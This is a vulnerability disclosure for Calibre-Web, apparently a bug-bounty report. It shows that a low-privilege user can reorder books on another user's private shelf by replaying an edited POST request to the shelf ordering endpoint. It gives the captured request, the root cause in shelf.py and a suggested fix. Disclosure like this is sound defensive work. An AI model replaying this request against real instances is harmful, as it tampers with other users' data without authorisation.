Description

With default settings, low-level users will not have permission to edit the sort order of books in private shelf of another user. However, due to incorrect checking, the application does not work as intended.

Proof of Concept

• Step 1: Login with admin account and go to http://hostname:8083/admin/user/new. Create new user “test1” with default permissions (only “Show *” permissions).
• Step 2: admin create private shelf, and books to shelf.
• Step 3: test1 get id of admin’s private shelf (brute-force, leak data,…) and go to http://hostname:8083/shelf/order/:id (in Poc http://192.168.150.133:8083/shelf/order/3).
• Step 4: test1 click save and capture request in burpsuite. test1 put data and recall request to edit the sort order of books in shelf 3 (private shelf of admin)
  Request:

POST /shelf/order/3 HTTP/1.1
Host: 192.168.150.133:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
Origin: http://192.168.150.133:8083
Connection: close
Referer: http://192.168.150.133:8083/shelf/order/3
Cookie: session=.eJwljjtuAzEMBe-iOgV_4oq-zEKkSNgIkAC7dhXk7lkj3bx5zfy0vY487-32PF750fbHaremle4oAOUMmtFjRZ_OtapnRAayJktVokyrraoMttE7oW3ahZaJEfCQoVM3zgVAsiYNjjAuiU18GLuvyezl-D5gQhGJoLYr5HXm8V_D14zzqP35_ZlflwAtGIiKZkXxZpqDJ-lanmEis_fZC9vvH4AIP8o.Ye-55g.y2WeHCTSR6u3ZeXWL6zHGWmQWh4; remember_token=3|a0ad3ac22b2a1c95b6d18388d0186fbcd887a7b02378a4bb2498dc8a32770e173b14bae215b37137207d498cc4a6bdfd8c1b0784ee2f81085bebf3e6d3006edd
Upgrade-Insecure-Requests: 1

1=2&2=1&csrf_token=IjA2ZjA4MTE2MTk5ZjJjZjA4MTJhODNhMjZkZGJlYzk0NGE1NWE1ZjEi.Ye-55g.t3T1U1i3rXOQoAK-1Wi6sUtXm1I

• PoC: https://drive.google.com/file/d/1iyO9WntPQq7b_2EXq76JZz3vT89jOnP4

Root-cause

In line 362 (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L362), server checks request’s method (POST) and processes the data directly, without checking the user’s permission to the shelf. I recommend putting code for user permissions check (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L380) at the top of order_shelf function.

Impact

Low-level user can edit the sort order of books in any shelf (include private shelf of another user).